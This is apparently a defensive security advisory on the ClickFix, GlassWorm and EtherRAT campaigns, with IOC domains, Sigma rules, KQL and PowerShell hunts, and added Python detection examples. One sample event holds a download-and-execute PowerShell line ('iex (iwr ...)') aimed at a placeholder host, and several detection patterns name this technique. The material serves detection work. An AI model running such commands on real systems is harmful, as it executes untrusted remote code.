
ClickFix, GlassWorm & EtherRAT: Multi-Vector APT Campaign Analysis — Enterprise Defense Pack

Security Arsenal Team
April 26, 2026
6 min read

Current OTX pulse data indicates a convergence of sophisticated threat campaigns utilizing "Living-Off-The-Land" (LotL) techniques, supply chain compromise, and blockchain-based infrastructure to evade detection.

The primary threats identified are:

  1. ClickFix Campaigns: Social engineering attacks targeting Windows and macOS to deliver Lumma Stealer, Vidar, and Redline Stealer.
  2. GlassWorm: A supply-chain attack targeting developers via compromised repositories, utilizing the Solana blockchain for payload staging.
  3. EtherRAT: A North Korean APT-linked Node.js backdoor using "EtherHiding" to store C2 addresses in Ethereum smart contracts.

Collectively, these actors aim for initial access via deception (ClickFix) or trusted development tools (GlassWorm), with the end goal of credential theft, financial asset compromise, and persistent remote access.

Threat Actor / Malware Profile

| Malware / Actor | Distribution | Payload Behavior | C2 & Persistence |
|---|---|---|---|
| ClickFix Clusters | Social engineering (fake browser errors, Intuit/Booking.com impersonation). | Triggers via "repair" instructions; runs PowerShell/Bash to download loaders. Executes info-stealers (Lumma, Vidar). | Connects to delivery domains; persistence via scheduled tasks or startup folders. Heavy obfuscation. |
| GlassWorm | Supply chain (compromised code repos/package managers). | Fingerprinting -> fetches payload from Solana blockchain -> installs RAT + stealer. Targets crypto wallets and dev credentials. | Uses fake browser extensions for surveillance. C2 coordinates obfuscated via blockchain transactions. |
| EtherRAT (NK APT) | Phishing / IT support scams. | Node.js based backdoor. Gathers sys_info, host fingerprinting, CIS language checks. Arbitrary code execution. | EtherHiding: C2 addresses stored in Ethereum smart contract data fields. Uses CDN-like beaconing to blend in with web traffic. |

IOC Analysis

The provided indicators of compromise (IOCs) consist primarily of domains and hostnames used for payload delivery and C2 communication.

  • Delivery Domains (ClickFix): Used to host the initial malicious scripts or stealers (e.g., ustazazharidrus.com, account-help.info).
  • C2 / RPC Infrastructure (EtherRAT): Includes domains mimicking infrastructure or specific RPC endpoints (e.g., rpc.payload.de, o-parana.com).

Operational Guidance:

  • Blocklisting: Immediate ingestion of these domains into DNS firewalls and Secure Web Gateways (SWG).
  • Hunting: Use Zeek/Bro logs or DNS analytics to look for recently resolved domains matching the patterns above.
  • Decoding: Tools like CyberChef or VirusTotal can assist in de-obfuscating the PowerShell scripts often associated with the ClickFix initial access vector.
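A hunt over Zeek dns.log, as an added example that is not part of this advisory: it parses the log by its `#fields` header, matches each query against the IOC domains above with label-aware subdomain matching (so `notaccount-help.info` does not fire on `account-help.info`), and tags hits with the same context labels the KQL query below uses. The dns.log lines are constructed sample data; only the four domains come from the IOC section.

```python
"""Hunt a Zeek dns.log for queries that hit the advisory's IOC domains.

Added example, not part of the original advisory. The dns.log records below
are constructed sample data; the IOC list comes from the IOC Analysis section.
"""
from __future__ import annotations

from typing import Iterator

# Domains from the advisory's IOC Analysis section.
IOC_DOMAINS = {
    "ustazazharidrus.com",
    "account-help.info",
    "rpc.payload.de",
    "o-parana.com",
}

# Constructed sample dns.log, trimmed to the columns this hunt needs. A real
# log carries more columns; the parser keys on the #fields header, so that is fine.
SAMPLE_DNS_LOG = """
#fields\tts\tuid\tid.orig_h\tquery\tqtype_name\trcode_name\tanswers
#types\ttime\tstring\taddr\tstring\tstring\tstring\tvector[string]
1777200000.123\tCx1\t10.0.0.5\tupdate.ustazazharidrus.com\tA\tNOERROR\t203.0.113.10
1777200001.456\tCx2\t10.0.0.7\twww.example.com\tA\tNOERROR\t203.0.113.20
1777200002.789\tCx3\t10.0.0.9\trpc.payload.de\tA\tNOERROR\t203.0.113.30
1777200003.000\tCx4\t10.0.0.9\tnotaccount-help.info\tA\tNXDOMAIN\t-
"""


def parse_zeek_log(text: str) -> Iterator[dict[str, str]]:
    """Yield one dict per record, keyed by the column names in the #fields header."""
    fields: list[str] = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):
            continue  # #separator, #types, #open, #close metadata lines
        yield dict(zip(fields, line.split("\t")))


def ioc_match(name: str, iocs: set[str]) -> str | None:
    """Return the IOC domain that `name` equals or is a subdomain of, else None.

    Walks label boundaries instead of using endswith(), so a lookalike such as
    'notaccount-help.info' does not match 'account-help.info'.
    """
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def hunt_dns_log(text: str, iocs: set[str] = IOC_DOMAINS) -> list[dict[str, str]]:
    """Return records whose query hits an IOC, annotated with 'ioc' and 'context'."""
    hits: list[dict[str, str]] = []
    for rec in parse_zeek_log(text):
        matched = ioc_match(rec.get("query", ""), iocs)
        if matched is None:
            continue
        # Same triage labels as the advisory's KQL query.
        context = "Potential EtherRAT C2" if "rpc" in matched else "Potential ClickFix delivery"
        hits.append({**rec, "ioc": matched, "context": context})
    return hits


if __name__ == "__main__":
    for h in hunt_dns_log(SAMPLE_DNS_LOG):
        print(f"{h['ts']} {h['id.orig_h']} -> {h['query']} [{h['ioc']}] {h['context']}")
```

To run it against a real capture, pass the contents of `dns.log` to `hunt_dns_log()`; the `id.orig_h` of each hit is the host to isolate under the Immediate response priority.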

Detection Engineering

Sigma Rules

```yaml
---
title: Potential ClickFix Social Engineering Activity
id: 8a4b3c2d-1e0f-4a5b-8c9d-0e1f2a3b4c5d
description: Detects suspicious PowerShell or Bash execution patterns often associated with ClickFix campaigns, specifically commands triggered by user interaction or "repair" scripts.
status: experimental
date: 2026/04/26
author: Security Arsenal
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'copyitem'
      - 'invoke-expression'
      - 'iex'
  filter_legit:
    ParentImage|contains:
      - '\explorer.exe'
  condition: selection and not filter_legit
falsepositives:
  - Legitimate system administration scripts
level: high
tags:
  - attack.initial_access
  - attack.execution
  - attack.t1204
---
title: Node.js Process Suspicious Network Connection
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects Node.js processes establishing network connections, characteristic of EtherRAT or GlassWorm backdoors communicating with C2 or blockchains.
status: experimental
date: 2026/04/26
author: Security Arsenal
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    Image|endswith: '\node.exe'
    Initiated: 'true'
  filter:
    DestinationPort|contains:
      - '80'
      - '443'
    DestinationHostname|contains:
      - 'node_modules.org'
      - 'npmjs.com'
      - 'github.com'
  condition: selection and not filter
falsepositives:
  - Legitimate Node.js web servers
level: medium
tags:
  - attack.command_and_control
  - attack.c2
  - attack.t1071
---
title: Suspicious Ethereum RPC Interaction via Script
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects scripts or processes attempting to interact with Ethereum Mainnet RPC endpoints, potentially indicative of EtherHiding or GlassWorm payload retrieval.
status: experimental
date: 2026/04/26
author: Security Arsenal
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    DestinationHostname|contains:
      - '.eth'
      - 'rpc.payload.de'
      - 'cloudflare-eth.com'
      - 'mainnet.infura.io'
    DestinationPort: 443
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\node.exe'
      - '\wscript.exe'
  condition: selection
falsepositives:
  - Legitimate Web3 applications or developer tools
level: high
tags:
  - attack.command_and_control
  - attack.defense_evasion
```
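The first Sigma rule matches `iex` and `invoke-expression` as substrings of `CommandLine`, but a launch that passes its script through `-EncodedCommand` carries only base64 over UTF-16LE on the command line, so those keywords never appear in clear text. The following added example (not part of this advisory or its rule set) decodes such payloads before applying the rule's selection and `filter_legit` logic to constructed process_creation events; the event paths and the `example.invalid` URL are placeholders.

```python
"""Expand PowerShell -EncodedCommand payloads before matching the ClickFix Sigma keywords.

Added example, not part of the advisory. The process_creation events are
constructed sample telemetry; the keyword list and the parent-image filter
mirror the advisory's first Sigma rule.
"""
from __future__ import annotations

import base64
import re

# Keywords from the Sigma rule's CommandLine|contains list (matched case-insensitively).
SUSPICIOUS_KEYWORDS = ("copyitem", "invoke-expression", "iex")

# Spellings of -EncodedCommand that powershell.exe accepts (also with a '/' prefix).
ENC_FLAG = re.compile(r"^[-/](e|ec|enc|encodedcommand)$", re.IGNORECASE)


def encode_ps(script: str) -> str:
    """Base64 over UTF-16LE, the encoding -EncodedCommand expects.
    Used only to build the constructed sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded_command(cmdline: str) -> str:
    """Return cmdline with every -EncodedCommand payload decoded and appended.

    The raw command line of an encoded launch never contains 'iex' or
    'Invoke-Expression' in clear text, so a substring rule misses it unless
    the payload is decoded first.
    """
    tokens = cmdline.split()
    decoded: list[str] = []
    for flag, value in zip(tokens, tokens[1:]):
        if not ENC_FLAG.match(flag):
            continue
        try:
            decoded.append(base64.b64decode(value, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            # Not valid base64 / UTF-16LE: surface it for review rather than drop it.
            decoded.append(f"<undecodable:{value[:16]}>")
    if not decoded:
        return cmdline
    return cmdline + " | DECODED: " + " ".join(decoded)


def matches_clickfix_rule(event: dict[str, str]) -> list[str]:
    """Apply the rule's logic (selection and not filter_legit) to one event.

    Returns the keywords that fired after expansion; an empty list means no alert.
    """
    image = event.get("Image", "").lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    # filter_legit from the rule: an explorer.exe parent suppresses the alert.
    if "\\explorer.exe" in event.get("ParentImage", "").lower():
        return []
    cmd = expand_encoded_command(event.get("CommandLine", "")).lower()
    return [kw for kw in SUSPICIOUS_KEYWORDS if kw in cmd]


# Constructed sample process_creation events (paths and URL are placeholders).
SAMPLE_EVENTS = [
    {   # Encoded launch: 'iex' only becomes visible after decoding
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
                       + encode_ps("iex (iwr https://example.invalid/x)"),
    },
    {   # Clear-text keyword, but launched from the Run dialog (explorer.exe
        # parent), so the rule's own filter_legit suppresses it
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "pwsh -c \"Invoke-Expression (iwr https://example.invalid/x)\"",
    },
    {   # Ordinary admin script: no keyword, no alert
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, matches_clickfix_rule(ev) or "no alert")
```

The second sample event is worth noting when tuning the rule: a command pasted into the Win+R Run dialog is spawned by explorer.exe, so the `filter_legit` exclusion as written will also suppress launches that come from exactly the kind of user interaction ClickFix relies on. Decide per environment whether that parent exclusion is worth the reduction in noise.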

KQL (Microsoft Sentinel / Defender)

```kql
// Hunt for ClickFix and EtherRAT Network Indicators
let IoC_Domains = dynamic([
    "ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com",
    "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com",
    "o-parana.com", "rpc.payload.de", "jariosos.com", "hayesmed.com",
    "regancontrols.com", "salinasrent.com", "justtalken.com", "mebeliotmasiv.com"
]);
DeviceNetworkEvents
| where RemoteUrl in (IoC_Domains) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend ThreatContext = case(
    RemoteUrl has "rpc", "Potential EtherRAT C2",
    RemoteUrl has_any ("ustazazharidrus", "account-help"), "Potential ClickFix Delivery",
    "Suspicious Domain Match"
)
```

```kql
// Hunt for suspicious Node.js activity (EtherRAT/GlassWorm)
DeviceProcessEvents
| where FileName =~ "node.exe"
| where ProcessCommandLine contains "http" or ProcessCommandLine contains "sock"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessParentFileName
| order by Timestamp desc
```

PowerShell Hunt Script

```powershell
<#
.SYNOPSIS
    Hunt for artifacts associated with ClickFix, GlassWorm, and EtherRAT.
.DESCRIPTION
    Checks DNS Cache, recent processes, and suspicious registry keys.
#>

$MaliciousDomains = @(
    "ustazazharidrus.com", "account-help.info", "quiptly.com", "rpc.payload.de", "o-parana.com"
)

Write-Host "[*] Checking DNS Cache for malicious domains..."
# Match the exact domain or any subdomain of it (e.g. update.<domain>)
$DnsCache = Get-DnsClientCache | Where-Object {
    $Entry = $_.Entry
    $MaliciousDomains | Where-Object { $Entry -eq $_ -or $Entry.EndsWith(".$_") }
}
if ($DnsCache) {
    Write-Host "[!] ALERT: Found malicious entries in DNS Cache:" -ForegroundColor Red
    $DnsCache | Format-Table Entry, Data, Type
} else {
    Write-Host "[-] No malicious DNS cache entries found."
}

Write-Host "[*] Checking for suspicious Node.js processes..."
$NodeProcesses = Get-CimInstance Win32_Process | Where-Object {
    $_.Name -eq "node.exe" -and $_.CommandLine -match "http|sock|rpc"
}
if ($NodeProcesses) {
    Write-Host "[!] ALERT: Suspicious Node.js processes running:" -ForegroundColor Red
    $NodeProcesses | Select-Object ProcessId, CommandLine
} else {
    Write-Host "[-] No suspicious Node.js processes found."
}

Write-Host "[*] Checking for Run keys associated with common stealers..."
$RunKeyPaths = @(
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
)
# Inspect each key separately: Get-ItemProperty on both paths returns an array,
# whose .PSObject.Properties would describe the array, not the Run values.
$SuspiciousEntries = foreach ($Path in $RunKeyPaths) {
    $Key = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    if ($null -eq $Key) { continue }
    # Skip the PS* metadata properties Get-ItemProperty attaches to every key
    $Key.PSObject.Properties |
        Where-Object { $_.Name -notlike "PS*" -and $_.Value -match "powershell -e|node .*\.js|cmd /c" } |
        Select-Object @{ n = "Key"; e = { $Path } }, Name, Value
}
if ($SuspiciousEntries) {
    Write-Host "[!] ALERT: Suspicious persistence mechanisms found:" -ForegroundColor Red
    $SuspiciousEntries | Format-Table Key, Name, Value
} else {
    Write-Host "[-] No suspicious persistence mechanisms found."
}
```


Response Priorities

*   **Immediate**:
    *   Block all domains and hostnames listed in the IOC Analysis section at the perimeter firewall and proxy.
    *   Scan all endpoints for the presence of Node.js processes in non-development environments.
    *   Isolate systems with confirmed DNS hits to the ClickFix or EtherRAT IOCs.

*   **24 Hours**:
    *   **Credential Reset**: If Lumma Stealer, Vidar, or Redline activity is suspected, force a password reset for users on infected machines and rotate developer API keys (GlassWorm targets).
    *   **Browser Extension Audit**: Review installed browser extensions on developer machines for unauthorized or fake extensions (GlassWorm).

*   **1 Week**:
    *   **Architecture Hardening**: Implement strict egress filtering for Node.js applications. Block access to public Ethereum/Solana RPC endpoints from non-approved corporate devices to prevent EtherHiding.
    *   **Security Awareness**: Update user training to recognize "ClickFix" social engineering tactics (fake browser errors calling for support).
